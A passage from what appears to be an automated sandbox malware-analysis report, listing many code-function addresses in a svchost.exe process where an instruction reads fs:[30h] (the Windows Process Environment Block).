                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0274 mov eax, dword ptr fs:[00000030h]7_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B8243 mov eax, dword ptr fs:[00000030h]7_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B8243 mov ecx, dword ptr fs:[00000030h]7_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A250 mov eax, dword ptr fs:[00000030h]7_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236259 mov eax, dword ptr fs:[00000030h]7_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402A0 mov eax, dword ptr fs:[00000030h]7_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402A0 mov eax, dword ptr fs:[00000030h]7_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov ecx, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C62A0 mov eax, dword ptr fs:[00000030h]7_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E284 mov eax, dword ptr fs:[00000030h]7_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E284 mov eax, dword ptr fs:[00000030h]7_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B0283 mov eax, dword ptr fs:[00000030h]7_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032402E1 mov eax, dword ptr fs:[00000030h]7_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323A2C3 mov eax, dword ptr fs:[00000030h]7_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260124 mov eax, dword ptr fs:[00000030h]7_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov ecx, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA118 mov eax, dword ptr fs:[00000030h]7_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F0115 mov eax, dword ptr fs:[00000030h]7_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov ecx, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C4144 mov eax, dword ptr fs:[00000030h]7_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C156 mov eax, dword ptr fs:[00000030h]7_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C8158 mov eax, dword ptr fs:[00000030h]7_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236154 mov eax, dword ptr fs:[00000030h]7_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03236154 mov eax, dword ptr fs:[00000030h]7_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03270185 mov eax, dword ptr fs:[00000030h]7_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC188 mov eax, dword ptr fs:[00000030h]7_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EC188 mov eax, dword ptr fs:[00000030h]7_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B019F mov eax, dword ptr fs:[00000030h]7_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A197 mov eax, dword ptr fs:[00000030h]7_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_033061E5 mov eax, dword ptr fs:[00000030h]7_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032601F8 mov eax, dword ptr fs:[00000030h]7_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F61C3 mov eax, dword ptr fs:[00000030h]7_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F61C3 mov eax, dword ptr fs:[00000030h]7_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE1D0 mov eax, dword ptr fs:[00000030h]7_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A020 mov eax, dword ptr fs:[00000030h]7_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C020 mov eax, dword ptr fs:[00000030h]7_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6030 mov eax, dword ptr fs:[00000030h]7_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4000 mov ecx, dword ptr fs:[00000030h]7_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E016 mov eax, dword ptr fs:[00000030h]7_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325C073 mov eax, dword ptr fs:[00000030h]7_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232050 mov eax, dword ptr fs:[00000030h]7_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6050 mov eax, dword ptr fs:[00000030h]7_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C80A8 mov eax, dword ptr fs:[00000030h]7_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F60B8 mov eax, dword ptr fs:[00000030h]7_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F60B8 mov ecx, dword ptr fs:[00000030h]7_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323208A mov eax, dword ptr fs:[00000030h]7_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032380E9 mov eax, dword ptr fs:[00000030h]7_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B60E0 mov eax, dword ptr fs:[00000030h]7_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C0F0 mov eax, dword ptr fs:[00000030h]7_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032720F0 mov ecx, dword ptr fs:[00000030h]7_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B20DE mov eax, dword ptr fs:[00000030h]7_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C720 mov eax, dword ptr fs:[00000030h]7_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C720 mov eax, dword ptr fs:[00000030h]7_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov eax, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov ecx, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326273C mov eax, dword ptr fs:[00000030h]7_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AC730 mov eax, dword ptr fs:[00000030h]7_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C700 mov eax, dword ptr fs:[00000030h]7_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230710 mov eax, dword ptr fs:[00000030h]7_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260710 mov eax, dword ptr fs:[00000030h]7_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238770 mov eax, dword ptr fs:[00000030h]7_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240770 mov eax, dword ptr fs:[00000030h]7_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov esi, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov eax, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326674D mov eax, dword ptr fs:[00000030h]7_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230750 mov eax, dword ptr fs:[00000030h]7_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE75D mov eax, dword ptr fs:[00000030h]7_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272750 mov eax, dword ptr fs:[00000030h]7_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272750 mov eax, dword ptr fs:[00000030h]7_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4755 mov eax, dword ptr fs:[00000030h]7_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032307AF mov eax, dword ptr fs:[00000030h]7_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032527ED mov eax, dword ptr fs:[00000030h]7_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BE7E1 mov eax, dword ptr fs:[00000030h]7_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032347FB mov eax, dword ptr fs:[00000030h]7_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032347FB mov eax, dword ptr fs:[00000030h]7_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323C7C0 mov eax, dword ptr fs:[00000030h]7_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B07C3 mov eax, dword ptr fs:[00000030h]7_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E627 mov eax, dword ptr fs:[00000030h]7_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03266620 mov eax, dword ptr fs:[00000030h]7_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268620 mov eax, dword ptr fs:[00000030h]7_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323262C mov eax, dword ptr fs:[00000030h]7_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE609 mov eax, dword ptr fs:[00000030h]7_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324260B mov eax, dword ptr fs:[00000030h]7_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03272619 mov eax, dword ptr fs:[00000030h]7_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F866E mov eax, dword ptr fs:[00000030h]7_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F866E mov eax, dword ptr fs:[00000030h]7_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A660 mov eax, dword ptr fs:[00000030h]7_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A660 mov eax, dword ptr fs:[00000030h]7_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03262674 mov eax, dword ptr fs:[00000030h]7_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324C640 mov eax, dword ptr fs:[00000030h]7_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C6A6 mov eax, dword ptr fs:[00000030h]7_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032666B0 mov eax, dword ptr fs:[00000030h]7_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234690 mov eax, dword ptr fs:[00000030h]7_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03234690 mov eax, dword ptr fs:[00000030h]7_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AE6F2 mov eax, dword ptr fs:[00000030h]7_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B06F1 mov eax, dword ptr fs:[00000030h]7_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B06F1 mov eax, dword ptr fs:[00000030h]7_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A6C7 mov eax, dword ptr fs:[00000030h]7_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240535 mov eax, dword ptr fs:[00000030h]7_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E53E mov eax, dword ptr fs:[00000030h]7_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C6500 mov eax, dword ptr fs:[00000030h]7_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03304500 mov eax, dword ptr fs:[00000030h]7_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326656A mov eax, dword ptr fs:[00000030h]7_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238550 mov eax, dword ptr fs:[00000030h]7_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03238550 mov eax, dword ptr fs:[00000030h]7_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]7_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]7_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B05A7 mov eax, dword ptr fs:[00000030h]7_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032545B1 mov eax, dword ptr fs:[00000030h]7_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032545B1 mov eax, dword ptr fs:[00000030h]7_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232582 mov eax, dword ptr fs:[00000030h]7_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232582 mov ecx, dword ptr fs:[00000030h]7_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03264588 mov eax, dword ptr fs:[00000030h]7_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E59C mov eax, dword ptr fs:[00000030h]7_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325E5E7 mov eax, dword ptr fs:[00000030h]7_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032325E0 mov eax, dword ptr fs:[00000030h]7_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C5ED mov eax, dword ptr fs:[00000030h]7_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326C5ED mov eax, dword ptr fs:[00000030h]7_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E5CF mov eax, dword ptr fs:[00000030h]7_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E5CF mov eax, dword ptr fs:[00000030h]7_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032365D0 mov eax, dword ptr fs:[00000030h]7_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A5D0 mov eax, dword ptr fs:[00000030h]7_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A5D0 mov eax, dword ptr fs:[00000030h]7_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]7_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]7_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322E420 mov eax, dword ptr fs:[00000030h]7_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322C427 mov eax, dword ptr fs:[00000030h]7_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B6420 mov eax, dword ptr fs:[00000030h]7_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326A430 mov eax, dword ptr fs:[00000030h]7_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]7_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]7_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03268402 mov eax, dword ptr fs:[00000030h]7_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BC460 mov ecx, dword ptr fs:[00000030h]7_2_032BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]7_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]7_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325A470 mov eax, dword ptr fs:[00000030h]7_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E443 mov eax, dword ptr fs:[00000030h]7_2_0326E443
